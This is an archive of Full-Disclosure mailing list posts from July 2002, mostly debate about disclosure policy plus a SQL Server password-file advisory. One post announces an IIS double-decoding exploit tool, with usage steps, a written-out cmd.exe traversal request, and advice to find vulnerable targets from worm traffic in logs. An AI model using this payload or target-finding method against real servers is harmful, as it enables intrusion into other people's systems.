From len at NETSYS.COM  Tue Jul  9 16:53:29 2002
From: len at NETSYS.COM (len at NETSYS.COM)
Date: Tue, 9 Jul 2002 11:53:29 -0400
Subject: [Full-Disclosure] Testing
Message-ID: <200207091553.LAA16433@ironic.netsys.com>

Testing List


From weld at vulnwatch.org  Wed Jul 10 22:44:24 2002
From: weld at vulnwatch.org (Chris Wysopal)
Date: Wed, 10 Jul 2002 21:44:24 +0000 (GMT)
Subject: [Full-Disclosure] full disclosure lists
Message-ID:

Vulnwatch is another full disclosure mailing list. It is an advisory only
list. No discussions, just advisories. We have 3 moderators: RFP, Steve
Manzuik, and me. Information is available at www.vulnwatch.org.

We have been in operation for just about a year. We have never delayed or
rejected a posting that contained new vulnerability information. We have
over 4000 subscribers.

People interested in just the advisories and not the discussions that
frequently crop up on security lists may want to check us out.

Cheers,

Weld Pond
Moderator


From steve at entrenchtech.com  Thu Jul 11 01:27:39 2002
From: steve at entrenchtech.com (Steve)
Date: Wed, 10 Jul 2002 18:27:39 -0600
Subject: [Full-Disclosure] ANNOUNCEMENT - CSICON
In-Reply-To:
Message-ID: <000001c22871$c6d812a0$6401a8c0@Laptop2>

This is just a friendly reminder that the July 15th date for early
registration is fast approaching. Also, the speakers have been finalized
and the conference schedule is online at www.csicon.net/schedule.pdf

===================================
Computer Security & Intelligence Conference
Calgary, Alberta, Canada
August 19-21 - The Hyatt Regency
Cost - $1,300 (US Funds) Before July 15
Cost - $1,500 (US Funds) After July 15
==================================

The First Annual Computer Security & Intelligence Conference (CSICON) is
being held from August 19-21 at the Calgary Hyatt Regency. Sponsored by
Entrench Technologies, VulnWatch, and Syngress Media, this conference
promises to provide attendees with useful technical security knowledge.

The following people will be providing keynote talks during the lunch hour
(lunch will be provided);

Mark Loveless (aka Simple Nomad) - BindView Corporation / NMRC.ORG -
  Stealth Communications
Matt Conover (aka Shok) - Entercept / WooWoo.ORG - Microsoft .NET
Gerhard Eschelbeck & Sanket Naik - Qualys Inc. - Distributed Vulnerability
  Management

Additionally, the following people will be speaking throughout the
conference;

Ken Pfeil - Windows 2000 RootKits
Robert Slade - Forensic Programming
Kurt Seifried - Secure Data Deletion (Data retrieval/forensics)
Nathan Einwechter - Distributed Intrusion Detection
Michael Legary - x86 ShellCode & Intrusion Detection
Larry Leibrock - Windows XP Forensics
Manny Masongsong - Computer Crime
Mike Sues - Buffer Overflows
Ron DuFresne - Wireless Security
Eric Hines - VPN Abuse
Nathan Einwechter - Distributed Intrusion Detection
Craig Ozancin - Linux Security
Barry Kokotailo - Wireless Defense
Michael Legary - x86 Shellcode
Chris Farrow - VOIP Security

Evening Round Table Sessions are also being offered on the following
topics;

Full Disclosure hosted by Steve Manzuik
Forensics hosted by John Daniele
Attack & Penetration hosted by Barry Kokotailo

A continental breakfast and lunch are provided during the conference.

Join us Sunday (August 20th) evening for an early registrant reception and
meet the speakers.

For more information please visit www.csicon.net or contact the conference
organizers at info at csicon.net

Interested in becoming a sponsor of CSICON? Email info at csicon.net.

Are you a VulnWatch subscriber? You receive a $50.00 discount for
supporting the free open disclosure mailing list.

--
www.csicon.net


From len at netsys.com  Thu Jul 11 03:24:04 2002
From: len at netsys.com (Len Rose)
Date: Wed, 10 Jul 2002 22:24:04 -0400
Subject: [Full-Disclosure] The Death Of TCP/IP [OT]
Message-ID: <20020710222404.K24902@netsys.com>

Check out this article on PBS:
http://www.pbs.org/cringely/pulpit/pulpit20020627.html


From steve at entrenchtech.com  Thu Jul 11 04:12:09 2002
From: steve at entrenchtech.com (Steve)
Date: Wed, 10 Jul 2002 21:12:09 -0600
Subject: [Full-Disclosure] The Death Of TCP/IP [OT]
In-Reply-To: <20020710222404.K24902@netsys.com>
Message-ID: <000201c22888$c16dff70$6401a8c0@Laptop2>

Interesting article but I think he is wrong. Palladium (I keep wanting to
spell it Playdium - you know the big arcades in the movie theatres...) is
starting to look more like an anti-piracy campaign than it is security.
The true test is going to be how Palladium compliant hardware will react
to non-Palladium operating systems.

In the article the guy talks about "TCP/MS" -- this will never work. MS
owns the home and corporate desktops, but there are way too many legacy
boxes on the Internet and way too many legacy applications that require
*NIX boxes to run. What does this mean? This means that TCP/IP can never
be replaced until these applications are replaced. This is something that
isn't going to happen for a very long time if at all.

Even if the whole TCP/MS thing came to be, what is going to stop people
from simply keeping their legacy TCP/IP networks and ignoring MS boxes? I
highly doubt anyone on this mailing list depends on MSN or any MS product
to use the Internet (strangely enough I am typing this on an XP
box...arrrgh). MS is taking a huge step toward becoming completely
proprietary.....hasn't history taught them how successful proprietary
systems have been?

One interesting thing that no one seems to have mentioned - the Intel CPU
Serial # that caused an uproar a few years back. They exist, disabled by
default in the BIOS, but I am willing to bet that this will be a key part
in Palladium -- MS is going to need a way to identify each computer -- so
that means either MAC addresses (which have proven to have duplicates and
can be easily spoofed) or CPU ID # / Serial #. Hello.....big
brother.........

Of course this is mostly speculation but time will tell. I for one cannot
wait for more complete technical details.

Regards;

Steve Manzuik
Founder & Technical Lead
Entrench Technologies
www.entrenchtech.com
Moderator - VulnWatch
www.vulnwatch.org
-=-=-=-=-=-=-=-=-=-=-=-www.csicon.net=-=-=-=-=-=-=-=-=-=-=-

> -----Original Message-----
> From: full-disclosure-admin at lists.netsys.com
> [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Len Rose
> Sent: Wednesday, July 10, 2002 8:24 PM
> To: full-disclosure at lists.netsys.com
> Subject: [Full-Disclosure] The Death Of TCP/IP [OT]
>
>
> Check out this article on PBS:
> http://www.pbs.org/cringely/pulpit/pulpit20020627.html
>
> _______________________________________________
> Full-Disclosure mailing list
> Full-Disclosure at lists.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure


From techs at obfuscation.org  Thu Jul 11 05:47:33 2002
From: techs at obfuscation.org (Erik Fichtner)
Date: Thu, 11 Jul 2002 00:47:33 -0400
Subject: [Full-Disclosure] full disclosure lists
Message-ID: <20020711044732.GE10584@obfuscation.org>

...from the archives, Weld Pond wrote:
> Vulnwatch is another full disclosure mailing list. It is an advisory only
> list. No discussions, just advisories. We have 3 moderators: RFP, Steve
> Manzuik, and me. Information is available at www.vulnwatch.org.

I dunno, weld. Naming the list "full-disclosure" certainly beats the point
home with more force than "vulnwatch". ;) (not that I'm knocking
vulnwatch.)

Of course, there's also the Yet-Another-Mailing-List factor. [1]

Then, there's also the added irony of the list archives only being
available to list members. But it's a brand new list, so I'll not make
too much noise about that.

...we could get into a debate about targeted email advertisements while
we're waiting for things to get started. That'd probably be off-topic,
though.

[1] (although, that's not exactly a bad thing.. I, personally, get so much
crap in my inbox that when serious issues do crop up, they're often
crossposted to all N mailing lists, which makes it stand out a little.
...And some lists deliver faster than others...)

--
Erik Fichtner; Unix Ronin
http://www.obfuscation.org/techs/
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759


From steve at entrenchtech.com  Thu Jul 11 06:04:54 2002
From: steve at entrenchtech.com (Steve)
Date: Wed, 10 Jul 2002 23:04:54 -0600
Subject: [Full-Disclosure] full disclosure lists
In-Reply-To: <20020711044732.GE10584@obfuscation.org>
Message-ID: <001101c22898$81abb890$6401a8c0@Laptop2>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Of course, there's also the Yet-Another-Mailing-List factor. [1]
>

The more the merrier. Having only one or two mailing lists that report
vulnerabilities is like having only one or two newspapers. The key
difference between VulnWatch and this new and welcomed addition is the
fact that VulnWatch doesn't allow the discussions. This was done because
many complained that their mailbox would have 300+ messages a day which
makes it easy to miss the important stuff..

> Then, there's also the added irony of the list archives only
> being available to list members. But it's a brand new list,
> so I'll not
> make too much noise about that.

Well, at least they have list archives. :-) Ours are still at Neohapsis,
mostly a time thing for us as all of the VulnWatch moderators have day
jobs that constantly run into after hours.....blah...

> [1] (although, that's not exactly a bad thing.. I,
> personally, get so much
> crap in my inbox that when serious issues do crop up, they're
> often crossposted to all N mailing lists, which makes it
> stand out a little. ...And some lists deliver faster than
> others...)

One of the issues that causes a delay in message delivery is the
subscriber base. I know this was definitely true with Listserv -- the
first few people to subscribe get messages nice and quick while the last
few get messages much later. Take Bugtraq for example, if you are
subscriber 10 you will most likely see the message long before subscriber
20000 sees it. Mind you, now that they are off of Listserv this problem
might have been addressed. I have yet to do any performance testing for
VulnWatch.

Unfortunately, cross posting is the only bad side to multiple mailing
lists.

Regards;

Steve Manzuik
Founder & Technical Lead
Entrench Technologies
www.entrenchtech.com
Moderator - VulnWatch
www.vulnwatch.org
- -=-=-=-=-=-=-=-=-=-=-=- www.csicon.net -=-=-=-=-=-=-=-=-=-=-=-

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBPS0R9WWolZy6IFPhEQKBHQCglN9/EeJnXL/tlvf2ctRAp5JfjHEAn3Ui
5y5Z8hFLNQ92fwsD9SladIF2
=JMyf
-----END PGP SIGNATURE-----


From Simon.Richter at phobos.fachschaften.tu-muenchen.de  Thu Jul 11 12:42:16 2002
From: Simon.Richter at phobos.fachschaften.tu-muenchen.de (Simon Richter)
Date: Thu, 11 Jul 2002 13:42:16 +0200 (CEST)
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <200207110346.g6B3khX29736@netsys.com>
Message-ID:

Hi,

> We are pleased to announce the creation of a new security mailing list
> dedicated to FULL DISCLOSURE. When Scott Chasin handed over the bugtraq
> mailing list, it was clearly dedicated to the immediate and full
> dissemination of security issues. The current bugtraq mailing list has
> changed over the years, and some of us feel it has changed for the worse.

To me, the term "full disclosure" does not mean "make it available as fast
as possible", but rather "here is the information, expect it to leak in
the next two weeks, so go out and fix the bug". The current bugtraq scheme
enforces that, and I believe they are doing a great job.

By creating a forum in which vulnerability spotters can get "instant
fame", you are forcing software vendors to monitor the forum 24/7, as a
new vulnerability in their software could be disclosed anytime, and at the
moment it is disclosed, script kiddies are hacking it into their scanners
while it could be 4 am in the vendor's timezone. If we are lucky enough
that the vulnerability is spotted by a whitehat, we should not jeopardize
the time advantage we have by announcing it publicly.

In short, I think this is a bad idea because it adds confusion for the
vulnerability spotters, risks early disclosure before fixes are available
and thus harms the users.

   Simon

--
GPG public key available from http://phobos.fs.tum.de/pgp/Simon.Richter.asc
Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4


From johnc at grok.org.uk  Thu Jul 11 14:57:26 2002
From: johnc at grok.org.uk (John Cartwright)
Date: Thu, 11 Jul 2002 14:57:26 +0100
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To:
References: <200207110346.g6B3khX29736@netsys.com>
Message-ID: <20020711135726.GA27619@www1.grok.org.uk>

On Thu, Jul 11, 2002 at 01:42:16PM +0200, Simon Richter wrote:

Simon,

You may wish to subscribe to the list so that you and others may debate
this issue. The list is configured so that non-members may not post.

> To me, the term "full disclosure" does not mean "make it available as fast
> as possible", but rather "here is the information, expect it to leak in
> the next two weeks, so go out and fix the bug". The current bugtraq scheme
> enforces that, and I believe they are doing a great job.

We are placing the responsibility with the individual, not with an
organisation here. What we do not believe in is having a situation where a
select few are aware of a problem, but 99% of the internet populace are
powerless to defend against it. We are not saying that the vendor should
not be informed, we are saying, inform the people and the vendor
simultaneously.

> By creating a forum in which vulnerability spotters can get "instant
> fame", you are forcing software vendors to monitor the forum 24/7, as a
> new vulnerability in their software could be disclosed anytime, and at the
> moment it is disclosed, script kiddies are hacking it into their scanners
> while it could be 4 am in the vendor's timezone. If we are lucky enough
> that the vulnerability is spotted by a whitehat, we should not jeopardize
> the time advantage we have by announcing it publicly.

This situation already occurs. If a researcher leaks information to a few
'allies', if a technique is discovered 'in the wild', or if a vendor
silently fixes unknown problems, then there are those who possess the
knowledge and those that don't. We are simply providing a forum for those
who wish to try and balance out this situation.

> In short, I think this is a bad idea because it adds confusion for the
> vulnerability spotters, risks early disclosure before fixes are available
> and thus harms the users.

Early disclosure is important, IMO, as was proved with the recent Apache
flaw. I believe there were reports of Gobbles' exploit being active in the
wild long before the patched packages were available, and being alerted to
the problem even if there was no fix would have at least given admins a
'heads-up' and allowed people to make informed business decisions. Of
course, this is our personal opinion, but we hope that others concur and
wish to share in our resource.

- John


From SkyLined at edup.tudelft.nl  Thu Jul 11 16:28:06 2002
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Thu, 11 Jul 2002 17:28:06 +0200
Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer
Message-ID: <000e01c228ef$8e547670$1b59a182@grotedoos>

(Ok, it's an old bug but since a lot of non-geeks seem to hate updating
their IIS, there still are plenty of valid targets for this exploit.)

-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED --
The attached file IISexplorer.php is my "SCRIPT KIDDIE COMPATIBLE" exploit
for the double urldecoding bug in IIS. (It's a modified version of
PHPexplorer, also written by yours truly ;)

-- HOW TO INSTALL --
Simply put all the icons in the RAR file and the file IISexplorer.php on
your PHP enabled webserver. The icons should go into the /icons2/
directory, the IISexplorer.php file can be put anywhere.

-- HOW TO USE --
Browse to
http://your-server/path/IISexplorer.php?host=[ip of vulnerable target]
and you can browse the target system using an explorer style interface.
Please remember, this is version 0.1 beta! So don't expect it to handle
errors well.

-- WHERE TO FIND TARGETS TO EXPLORE --
Scan your webserver's logfiles for
"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
to get a list of vulnerable IIS's that have been infected with a worm that
propagates through this vulnerability.

-- NOTES --
The left frame takes some time to load, since it requires 1 http request
for each directory in the list. Make sure to have a decent connection to
the internet because this might use quite some bandwidth ;)

-- FUTURE VERSIONS --
I'm probably not gonna invest more time, since it works. Maybe I'm gonna
put in an upload/download facility but that would make stuff a bit too
easy for them 14 year olds, wouldn't it ?

-- YOURS TRULY --
Berend-Jan Wever aka SkyLined
http:/spoor12.edup.tudelft.nl
.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: IISexplorer.php
Type: application/octet-stream
Size: 15194 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: icons2.rar
Type: application/x-rar-compressed
Size: 16360 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020711/dc1dbbdb/attachment.bin


From BlueBoar at thievco.com  Thu Jul 11 17:04:21 2002
From: BlueBoar at thievco.com (Blue Boar)
Date: Thu, 11 Jul 2002 09:04:21 -0700
Subject: [Full-Disclosure] Re: Announcing new security mailing list
References:
Message-ID: <3D2DAC85.4010200@thievco.com>

Simon Richter wrote:
> To me, the term "full disclosure" does not mean "make it available as fast
> as possible", but rather "here is the information, expect it to leak in
> the next two weeks, so go out and fix the bug". The current bugtraq scheme
> enforces that, and I believe they are doing a great job.

There is no Bugtraq "scheme". The Bugtraq moderator does not hold any
posts. The poster gets to decide when his information is released. The
people who post to Bugtraq are just as able to blindside a vendor as on
any other mailing list.

The closest thing to what you describe that is offered by SecurityFocus is
the vulnhelp service. This is a way for someone who finds a bug to
voluntarily dump the hassle of dealing with notifying the vendor and
waiting onto the SecurityFocus staff. Someone who uses vulnhelp still
wants to give the vendor advanced notice, they just don't want to do it
themselves. If they don't want the vendor to have any warning, they just
post to Bugtraq.

BB


From steve at videogroup.com  Thu Jul 11 17:13:40 2002
From: steve at videogroup.com (Steve)
Date: Thu, 11 Jul 2002 12:13:40 -0400
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <20020711135726.GA27619@www1.grok.org.uk>
References: <200207110346.g6B3khX29736@netsys.com> <20020711135726.GA27619@www1.grok.org.uk>
Message-ID:

On Thursday 11 July 2002 09:57 am, you wrote:
>Early disclosure is important, IMO, as was proved with the recent Apache
> flaw. I believe there were reports of Gobbles' exploit being active in the
> wild long before the patched packages were available, and being alerted to
> the problem even if there was no fix would have at least given admins a
> 'heads-up' and allowed people to make informed business decisions. Of
> course, this is our personal opinion, but we hope that others concur and
> wish to share in our resource.

The choice is between helping those who work hard to stay on top of
security issues and those who don't. (Rest assured that the underground
knows about holes very early on, often before Bugtraq reports it. Even if
they don't on any single issue, that policy is still too high of a risk
to gamble on.)

It is clear that if you are at least aware of the situation you can decide
how or what you want to do about it. You can disable, modify or ignore it,
and even push the developer to do it, but at least it's your call.

Some animals in the wild use the defense of being one of many as their
defense from being targeted as dinner. However obscurity is only slightly
better than nothing.

The fact that most admins don't understand or have the time readily
available to spend on security is a flaw, a deviation from the ideal scene
and cannot be used as an excuse to put those who work hard to keep
security in, at risk.

It is a sad reflection of society at large that we have to go through all
this pain just to operate a business, but it is also the world we live in
so get organized and do what you can to stay on top of it.

--
Steve Szmidt
V.P. Information Technology
Video Group Distributors, Inc.


From marcs at znep.com  Thu Jul 11 17:22:45 2002
From: marcs at znep.com (Marc Slemko)
Date: Thu, 11 Jul 2002 09:22:45 -0700 (PDT)
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <3D2DAC85.4010200@thievco.com>
Message-ID:

On Thu, 11 Jul 2002, Blue Boar wrote:

> Simon Richter wrote:
> > To me, the term "full disclosure" does not mean "make it available as fast
> > as possible", but rather "here is the information, expect it to leak in
> > the next two weeks, so go out and fix the bug". The current bugtraq scheme
> > enforces that, and I believe they are doing a great job.
>
> There is no Bugtraq "scheme". The Bugtraq moderator does not hold any
> posts. The poster gets to decide when his information is released. The
> people who post to Bugtraq are just as able to blindside a vendor as on any
> other mailing list.

Speaking from personal experience, the current bugtraq moderator does,
and the previous moderator also did, "hold" certain posts. The cases I
have seen fall into one of two categories:

1. having doubts about the authenticity of the information in the post

2. seeing if the poster would like to voluntarily withhold it temporarily
   and work with vendors.

Certainly, if the authenticity of the information is not in question and
if the poster insists on posting it, then I have no indication that it
would be withheld. I also don't have any reason to think this happens
frequently. But there is an extra layer there that, in some cases, does
result in submitted posts being delayed, normally with the consent of the
poster.

I'm not really sure of the need for a "full-disclosure" list, but time
will tell.

BTW, spewing "[full-disclosure]" into the subject line is a very annoying
thing for a list to do.


From steve at videogroup.com  Thu Jul 11 17:26:56 2002
From: steve at videogroup.com (Steve)
Date: Thu, 11 Jul 2002 12:26:56 -0400
Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer
In-Reply-To: <000e01c228ef$8e547670$1b59a182@grotedoos>
References: <000e01c228ef$8e547670$1b59a182@grotedoos>
Message-ID:

On Thursday 11 July 2002 11:28 am, you wrote:
>(Ok, it's an old bug but since a lot of non-geeks seem to hate updating
> their IIS, there still are plenty of valid targets for this exploit.)
>
>-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED --
>The attached file IISexplorer.php is my "SCRIPT KIDDIE COMPATIBLE" exploit
> for the double urldecoding bug in IIS. (It's a modified version of
> PHPexplorer, also written by yours truly ;)

>Berend-Jan Wever aka SkyLined
>http:/spoor12.edup.tudelft.nl
>.

Since it looks like we are going to have tools to test holes, the policy
of only releasing ones designed to test your own system for flaws needs to
be in. As Berend says we don't need to make it any easier for script
kiddies.

Also, this list is going to have script kiddies on it so people need to be
kept aware of not posting specifics about their network which can then be
used to root them. Too often I see people giving out all sorts of
information about their network on lists thinking there are only white
hats on it.

--
Steve Szmidt
V.P. Information Technology
Video Group Distributors, Inc.
From cesarc56 at yahoo.com  Thu Jul 11 17:32:37 2002
From: cesarc56 at yahoo.com (c c)
Date: Thu, 11 Jul 2002 09:32:37 -0700 (PDT)
Subject: [Full-Disclosure] SQL Server 7 & 2000 Installation process and Service Packs write encoded passwords to a file
Message-ID: <20020711163237.33693.qmail@web40012.mail.yahoo.com>

Security Advisory

Name: SQL Server 7 & 2000 Installation process and Service Packs write
encoded passwords to a file.
System Affected: Sql Server 7 & 2000, latest Service Packs.
Severity: High.
Author: Cesar Cerrudo.
Date: 07/11/2002
Advisory Number: CC070204

Overview:

When installing Microsoft SQL Server or the latest SQL Server Service
Packs, some files are created and not properly removed. These files are
designed to be used for unattended installs. During the installation,
values such as Windows user accounts, login names and passwords are saved
in these files.

Details:

After installing Microsoft SQL Server or the latest SQL Server Service
Packs, one or more copies of the file setup.iss are not properly removed
from the operating system. Two copies of setup.iss are created depending
on the version of SQL Server. Setup.iss is created in one or more of the
following directories:

%windir%
%sqlserverinstance%\install\

The copy of the file in the %windir% directory is created with the
permissions "Full Control" granted to the "Everyone" group. The other copy
of the file is created without weak permissions.

If SQL Server is set to Mixed Mode Authentication, the SQL Server login
and password used by the installation program are saved in the setup.iss
files. If SQL Server Service is set to run under a Windows user account
different than system account during the installation process, that
Windows user account and password are saved in the setup.iss files.

The passwords are encoded using a weak algorithm. The encoded password can
be easily broken without understanding the encoding algorithm using the
Installation process or the Service Pack with a chosen-plaintext attack.
Any user with access to the setup.iss file could decode the password and
gain unauthorized access to SQL Server.

More Details:
http://www.appsecinc.com/resources/alerts/mssql/02-0009.html

Vendor Status: Microsoft was contacted on May 07, 2002. We worked together
and Microsoft released a security bulletin and a fix.

Patch Available:
http://www.microsoft.com/technet/security/bulletin/MS02-035.asp

Workaround: Delete the SQL Server setup.iss files created when SQL Server
is installed or when a Service Pack is installed. Change the passwords
that might be exposed by this vulnerability.

Thanks!: Special thanks to Aaron Newman (Application Security, Inc.) for
his collaboration in testing and advisory draft, and to Raul Aguerrebehere
for his contribution of many setup.iss files.


From poptix at techmonkeys.org  Thu Jul 11 18:00:54 2002
From: poptix at techmonkeys.org (Matthew S. Hallacy)
Date: Thu, 11 Jul 2002 12:00:54 -0500
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <3D2DAC85.4010200@thievco.com>; from BlueBoar@thievco.com on Thu, Jul 11, 2002 at 09:04:21AM -0700
References: <3D2DAC85.4010200@thievco.com>
Message-ID: <20020711120054.E1270@techmonkeys.org>

On Thu, Jul 11, 2002 at 09:04:21AM -0700, Blue Boar wrote:
> There is no Bugtraq "scheme". The Bugtraq moderator does not hold any
> posts. The poster gets to decide when his information is released. The
> people who post to Bugtraq are just as able to blindside a vendor as on any
> other mailing list.
>
> The closest thing to what you describe that is offered by SecurityFocus is
> the vulnhelp service. This is a way for someone who finds a bug to
> voluntarily dump the hassle of dealing with notifying the vendor and
> waiting onto the SecurityFocus staff. Someone who uses vulnhelp still
> wants to give the vendor advanced notice, they just don't want to do it
> themselves. If they don't want the vendor to have any warning, they just
> post to Bugtraq.
>
> BB

I disagree, I think my DOCSIS vulnerability posting is a good example of
something that should have gone out immediately, but was /never/ posted.
( I ended up taking it to another list) It was valid, the vendors knew,
but it was withheld because you deemed it 'malicious'.

--
Matthew S. Hallacy                            FUBAR, LART, BOFH Certified
http://www.poptix.net                           GPG public key 0x01938203


From poptix at techmonkeys.org  Thu Jul 11 18:04:14 2002
From: poptix at techmonkeys.org (Matthew S. Hallacy)
Date: Thu, 11 Jul 2002 12:04:14 -0500
Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer
In-Reply-To: ; from steve@videogroup.com on Thu, Jul 11, 2002 at 12:26:56PM -0400
References: <000e01c228ef$8e547670$1b59a182@grotedoos>
Message-ID: <20020711120414.F1270@techmonkeys.org>

On Thu, Jul 11, 2002 at 12:26:56PM -0400, Steve wrote:
> Since it looks like we are going to have tools to test holes, the policy of
> only releasing ones designed to test your own system for flaws, needs to be
> in. As Berend says we don't need to make it any easier for script kiddies.
>

Unfortunately the exploits that are found on the rooted box are pretty
much never anti-script kiddie, and the problem with subtle breakage of
remote scripts is that it makes it very hard for joe-blow network admin
to prove that there /is/ a vulnerability to the people he has to okay a
maintenance window with.

[snip]

> Steve Szmidt

--
Matthew S. Hallacy                            FUBAR, LART, BOFH Certified
http://www.poptix.net                           GPG public key 0x01938203


From steve at entrenchtech.com  Thu Jul 11 18:00:47 2002
From: steve at entrenchtech.com (Steve)
Date: Thu, 11 Jul 2002 11:00:47 -0600
Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer
References: <000e01c228ef$8e547670$1b59a182@grotedoos>
Message-ID: <003501c228fc$80fa4470$f954b8a1@entrenchtech.com>

So how hard is it going to be to take a tool/script that only tests
localhost and modify it to test other hosts? There is really no point in
forcing localhost as it won't stop anyone.

Regards;

Steve Manzuik
Founder & Technical Lead
Entrench Technologies
www.entrenchtech.com
Moderator - VulnWatch
www.vulnwatch.org
www.csicon.net

----- Original Message -----
From: "Steve"
To:
Sent: Thursday, July 11, 2002 10:26 AM
Subject: Re: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer

> On Thursday 11 July 2002 11:28 am, you wrote:
> >(Ok, it's an old bug but since a lot of non-geeks seem to hate updating
> > their IIS, there still are plenty of valid targets for this exploit.)
> >
> >-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED --
> >The attached file IISexplorer.php is my "SCRIPT KIDDIE COMPATIBLE" exploit
> > for the double urldecoding bug in IIS. (It's a modified version of
> > PHPexplorer, also written by yours truly ;)
>
> >Berend-Jan Wever aka SkyLined
> >http:/spoor12.edup.tudelft.nl
> >.
>
> Since it looks like we are going to have tools to test holes, the policy of
> only releasing ones designed to test your own system for flaws, needs to be
> in. As Berend says we don't need to make it any easier for script kiddies.
>
> Also, this list is going to have script kiddies on it so people need to be
> kept aware of not posting specifics about their network which can then be
> used to root them. Too often I see people giving out all sorts of information
> about their network on lists thinking there are only white hats on it.
> --
>
> Steve Szmidt
> V.P. Information Technology
> Video Group Distributors, Inc.


From techs at obfuscation.org  Thu Jul 11 18:51:29 2002
From: techs at obfuscation.org (Erik Fichtner)
Date: Thu, 11 Jul 2002 13:51:29 -0400
Subject: [Full-Disclosure] IIS double UTF decoding bug (old) exploit: IIS explorer
In-Reply-To: <003501c228fc$80fa4470$f954b8a1@entrenchtech.com>
References: <000e01c228ef$8e547670$1b59a182@grotedoos> <003501c228fc$80fa4470$f954b8a1@entrenchtech.com>
Message-ID: <20020711175128.GF10584@obfuscation.org>

On Thu, Jul 11, 2002 at 11:00:47AM -0600, Steve wrote:
> So how hard is it going to be to take a tool/script that only tests
> localhost and modify it to test other hosts? There is really no point in
> forcing localhost as it won't stop anyone.

That, and it's an extra time-wasting step for a lot of admins who want to
scan their entire network to make sure they know where everything they
need to go fix is.. (Not everyone has well documented networks. I'd
speculate that most do not have well documented networks.)

That said, it might be nicer if more folks released Nessus NASL scripts
for testing purposes instead of half a dozen marginally broken tools, but
that probably won't ever happen. [1]

Admins responsible for the security of their networks need to be made
aware that there are problems, and they need to have adequate tools to
tell them exactly what they need to fix, and to prove that it's been
fixed. This in a world where many admins know less about security than
the average script kiddie.

[1] In my perfect world, every responsible advisory for a remote attack
would come with both a working NASL script to test it, and a set of well
written snort signatures to spot the attack in progress. C'mon guys, you
did all the work to discover and exploit the flaw, do a little more and
tell us how to watch for it while you're at it. (if that doesn't start an
argument of some sort, I don't know what will.)

--
Erik Fichtner; Unix Ronin
http://www.obfuscation.org/techs/
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety." -- Benjamin Franklin, 1759


From dufresne at winternet.com  Thu Jul 11 19:10:29 2002
From: dufresne at winternet.com (Ron DuFresne)
Date: Thu, 11 Jul 2002 13:10:29 -0500 (CDT)
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To:
Message-ID:

On Thu, 11 Jul 2002, Marc Slemko wrote:

[SNIP]

>
> BTW, spewing "[full-disclosure]" into the subject line is a very annoying
> thing for a list to do.
>

Actually, it makes it quite easy for procmail recipes and certain mail
readers to filter and categorize the messages. What gets annoying is when
there's a ton of html crap preceding messages, or those folks spewing
vacations into the lists. Not to mention those danged content filters
that are set to prevent folks from being offended by words like damn...

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
From pauls at utdallas.edu Thu Jul 11 19:12:44 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Thu, 11 Jul 2002 13:12:44 -0500 Subject: [Full-Disclosure] On Full Disclosure, broken scripts, life, the universe, and everything... Message-ID: <871080DEC5874D41B4E3AFC5C400611E02653249@UTDEVS02.campus.ad.utdallas.edu> As for the rest of the world?????........ Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Jay D. Dyson [mailto:jdyson at treachery.net] > Sent: Thursday, July 11, 2002 1:01 PM > To: Full Disclosure List > Subject: [Full-Disclosure] On Full Disclosure, broken > scripts, life, the universe, and everything... > > > All of these dilemmas regarding Full Disclosure escape > me for the simple reason that I view Full Disclosure with the > same philosophical frame as I view our rights as enumerated > by the Constitution of the United States. From shamrock at cypherpunks.to Thu Jul 11 19:56:47 2002 From: shamrock at cypherpunks.to (Lucky Green) Date: Thu, 11 Jul 2002 11:56:47 -0700 Subject: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #3 - 11 msgs In-Reply-To: <200207111812.g6BIC3n29922@netsys.com> Message-ID: <003c01c2290c$b6b1b0c0$6501a8c0@LUCKYVAIO> Ron wrote quoting Marc: > > BTW, spewing "[full-disclosure]" into the subject line is a very > > annoying thing for a list to do. > > > > Actually, it makes it quite easy for procmail recipies and > certain mail readers to filter and categorize the messages. > What gets annoying is when there's a ton of html crap > preceeding messages, or those folks spewing vactions into the > lists. Not to mention those danged content filters that are > set to prevent folks from being offended by words like damn... I believe most 